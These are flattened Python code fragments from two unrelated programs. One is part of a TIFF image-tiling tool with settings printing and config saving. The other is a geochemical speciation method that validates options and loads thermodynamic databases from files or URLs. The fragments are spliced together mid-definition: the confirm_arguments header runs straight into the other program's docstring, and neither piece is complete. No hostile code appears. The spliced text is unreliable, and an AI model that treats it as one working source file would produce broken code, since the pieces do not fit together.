-> Iterator: n = (img.shape[-1] // side[0]) * (img.shape[-2] // side[1]) logging.info(f"Output {n} images.") assert 0 != n xy_gen = init_xy(img, step, side, inverted) if not len(img.shape) in [2, 3]: logging.error("cannot split images with more than 3 dimensions.") raise ValueError for (x_start, y_start) in track(xy_gen): yield tsplit_fun[len(img.shape)](img, x_start, y_start, side) def print_settings(args: argparse.Namespace, clear: bool = True) -> None: settings_string = f""" # TIFF split v{args.version} Input file : {args.input} Output directory : {args.outdir} X side : {args.side[0]} Y side : {args.side[1]} Overlap : {args.overlap} Step : {args.step} Slice : {args.slice} Enlarge : {args.enlarge} Inverted : {args.inverted} """ if clear: settings_string = f"\033[H\033[J{settings_string}" print(settings_string) def save_settings(args: argparse.Namespace) -> None: config = cp.ConfigParser() config["MAIN"] = dict(input=args.input, outdir=args.outdir) config["ADVANCED"] = dict( x_side=str(args.side[0]), y_side=str(args.side[1]), slice=str(args.slice), enlarge=str(args.enlarge), inverted=str(args.inverted), ) if args.step is not None: config["ADVANCED"].update( dict(x_step=str(args.step[0]), y_step=str(args.step[1])) ) with open(os.path.join(args.outdir, "config.ini"), "w") as CF: config.write(CF) def confirm_arguments(args: argparse.Namespace) -> None:
Ignored if `get_mineral_sat` is False. get_redox : bool, default True Calculate potentials of redox couples? redox_type : str, default "Eh" Desired units of measurement for reported redox potentials. Can be "Eh", "pe", "logfO2", or "Ah". Ignored if `get_redox` is False. get_ion_activity_ratios : bool, default True Calculate ion/H+ activity ratios and neutral species activities? get_fugacity : bool, default True Calculate gas fugacities? get_basis_totals : bool, default True Report total compositions of basis aqueous species? get_solid_solutions : bool, default True Permit the calculation of solid solutions and include them in the speciation report? get_affinity_energy : bool, default False Calculate affinities and energy supplies of reactions listed in a separate user-supplied file? negative_energy_supplies : bool, default False Report negative energy supplies? If False, negative energy supplies are reported as 0 cal/kg H2O. If True, negative energy supplies are reported. A 'negative energy supply' represents the energy cost of depleting the limiting reactant of a reaction. This metric is not always helpful when examing energy supply results, so this option is set to False by default. rxn_filename : str, optional Name of .txt file containing reactions used to calculate affinities and energy supplies. Ignored if `get_affinity_energy` is False. not_limiting : list, default ["H+", "OH-", "H2O"] List containing names of species that are not considered limiting when calculating energy supplies. Ignored if `get_affinity_energy` is False. get_charge_balance : bool, default True Calculate charge balance and ionic strength? custom_data0 : bool, default False Deprecated. custom_db : bool, default False Deprecated. batch_3o_filename : str, optional Name of rds (R object) file exported after the speciation calculation? No file will be generated if this argument is not defined. delete_generated_folders : bool, default False Delete the 'rxn_3i', 'rxn_3o', 'rxn_3p', and 'eqpt_files' folders containing raw EQ3NR input, output, pickup, and EQPT files once the speciation calculation is complete? custom_obigt : str, optional Deprecated. db_args : dict, default {} Dictionary of arguments to modify how the thermodynamic database is processed. Only used when `db` points to thermodynamic data in a CSV file. Ignored if `db` points to a data0 file (because a data0 file is already ready for a speciation calculation). Options for `db_args` are passed to the `create_data0` function, so refer to `create_data0` for more information about what options are possible. - Example of `db_args` where organics are excluded and redox is suppressed for Fe and S: db_args = { "exclude_category":{"category_1":["organic_aq"]}, "suppress_redox":["Fe", "S"], } Returns ------- speciation : object of class Speciation Contains the results of the speciation calculation. """ if custom_db == True: print("Warning: the parameter 'custom_db' is deprecated. " "Specify a custom data0 file with the 'db' parameter.") if custom_data0 == True: print("Warning: the parameter 'custom_data0' is deprecated. " "Specify a custom data0 file with the 'db' parameter.") if custom_obigt != None: print("Warning: the parameter 'custom_obigt' is deprecated. Specify " "a custom thermodynamic database with the 'db' parameter. If " "a database is needed for affinity and energy calculations, " "use the parameter 'rxn_filename' to specify a CSV file of " "thermodynamic data or a TXT file with desired reactions.") if len(db) == 3: # e.g., "wrm" custom_data0 = False data0_lettercode = db.lower() dynamic_db = False # search for a data1 file in the eq36da directory if os.path.exists(self.eq36da + "/data1." + db) and os.path.isfile(self.eq36da + "/data1." + db): self.thermo_db = None self.thermo_db_type = "data1 file" self.thermo_db_filename = "data1."+db elif os.path.exists("data0." + db) and os.path.isfile("data0." + db): if verbose > 0: print("data1." + db + " was not found in the EQ36DA directory " "but a data0."+db+" was found in the current working " "directory. Using it...") custom_data0 = True data0_lettercode = db dynamic_db = False # search for a data0 locally with open("data0."+db) as data0_content: self.thermo_db = data0_content.read() self.thermo_db_type = "data0 file" self.thermo_db_filename = "data0."+db else: msg = ("Could not locate a 'data1."+db+"' file in the EQ36DA " "directory, nor a 'data0."+db+"' file in the current " "working directory.") self.err_handler.raise_exception(msg) elif db[0:-4].lower() == "data0" and not (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "data0.wrm" custom_data0 = True data0_lettercode = db[-3:].lower() dynamic_db = False if os.path.exists(db) and os.path.isfile(db): with open(db) as data0_content: self.thermo_db = data0_content.read() self.thermo_db_type = "data0 file" self.thermo_db_filename = db else: self.err_handler.raise_exception("Could not locate the data0 file '"+db+"'") elif db[-4:].lower() == ".csv" and not (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "wrm_data.csv" if os.path.exists(db) and os.path.isfile(db): self.thermo_db = pd.read_csv(db) self.thermo_db_type = "CSV file" self.thermo_db_filename = db else: self.err_handler.raise_exception("Could not locate the CSV file '"+db+"'") db_args["filename"] = db db_args["db"] = "dyn" dynamic_db = True custom_data0 = False custom_obigt = db db_csv_name = db.split("/")[-1].lower() elif "data0." in db[-9:].lower() and db[-4:].lower() != ".csv" and (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "https://raw.githubusercontent.com/worm-portal/WORM-db/master/data0.wrm" # Download from URL and decode as UTF-8 text. with urlopen(db) as webpage: data0_content = webpage.read().decode() data0_filename = "data0."+db[-3:].lower() # Save to data0 file. with open(data0_filename, 'w') as output: output.write(data0_content) self.thermo_db = data0_content self.thermo_db_type = "data0 file" self.thermo_db_filename = data0_filename custom_data0 = True data0_lettercode = db[-3:] dynamic_db = False elif db[-4:].lower() == ".csv" and (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "https://raw.githubusercontent.com/worm-portal/WORM-db/master/wrm_data.csv" # e.g., "wrm_data.csv" db_csv_name = db.split("/")[-1].lower() # Download from URL and decode as UTF-8 text. with urlopen(db) as webpage: content = webpage.read().decode() # Save to CSV file. with open(db_csv_name, 'w') as output: output.write(content) self.thermo_db = pd.read_csv(db) self.thermo_db_type = "CSV file" self.thermo_db_filename = db_csv_name db_args["filename"] = db_csv_name db_args["db"] = "dyn" dynamic_db = True custom_data0 = False custom_obigt = db_csv_name else: self.err_handler.raise_exception("Unrecognized thermodynamic " "database '{}'".format(db)+" specified for db. A database can specified as:" "\n - a three letter code designating a data0 file. e.g., db='wrm'" "\n - a data0 file in your working directory. e.g., db='data0.wrm'" "\n - a csv file in your working directory. e.g., db='wrm_data.csv'" "\n - a URL directing to a data0 file. e.g.," "\n\t db='https://raw.githubusercontent.com/worm-portal/WORM-db/master/data0.wrm'" "\n\t (note the data0 file in the URL must have 'data0.' followed by a three letter code)" "\n - a URL directing to a valid csv file. e.g.," "\n\t db='https://raw.githubusercontent.com/worm-portal/WORM-db/master/wrm_data.csv'") self.verbose = verbose if (self.thermo_db_type == "data0 file" or self.thermo_db_type == "data1 file") and len(db_args) > 0: if self.verbose > 0: print("Ignoring db_args because a premade data0 or data1 file is being used: '" + db + "'") redox_suppression = False if "suppress_redox" in db_args.keys() and self.thermo_db_type != "data0 file" and self.thermo_db_type != "data1 file": if len(db_args["suppress_redox"]) > 0: redox_suppression = True # check input sample file for errors self._check_sample_input_file(input_filename, exclude, db, custom_data0, dynamic_db, charge_balance_on, suppress_missing, redox_suppression) if aq_dist_type not in ["molality", "log_molality", "log_gamma", "log_activity"]: self.err_handler.raise_exception("Unrecognized aq_dist_type. Valid " "options are 'molality', 'log_molality', 'log_gamma', 'log_activity'") if mineral_sat_type not in ["logQoverK", "affinity"]: self.err_handler.raise_exception("Unrecognized mineral_sat_type. Valid " "options are 'logQoverK' or 'affinity'") if redox_type not in ["Eh", "pe", "logfO2", "Ah"]: self.err_handler.raise_exception("Unrecognized redox_type. Valid " "options are 'Eh', 'pe', 'logfO2', or 'Ah'") if redox_flag == "O2(g)" or redox_flag == -3: redox_flag = -3 elif redox_flag == "pe" or redox_flag == -2: redox_flag = -2 elif redox_flag == "Eh" or redox_flag == -1: redox_flag = -1 elif redox_flag == "logfO2" or redox_flag == 0: redox_flag = 0 elif redox_flag == "redox aux" or redox_flag == 1: redox_flag = 1 else: self.err_handler.raise_exception("Unrecognized redox flag. Valid options are 'O2(g)'" ", 'pe', 'Eh', 'logfO2', 'redox aux'") # handle batch_3o naming if batch_3o_filename != None: if ".rds" in batch_3o_filename[-4:]: batch_3o_filename = batch_3o_filename else: batch_3o_filename = "batch_3o_{}.rds".format(data0_lettercode) else: batch_3o_filename = ro.r("NULL") # custom obigt used for energy calculations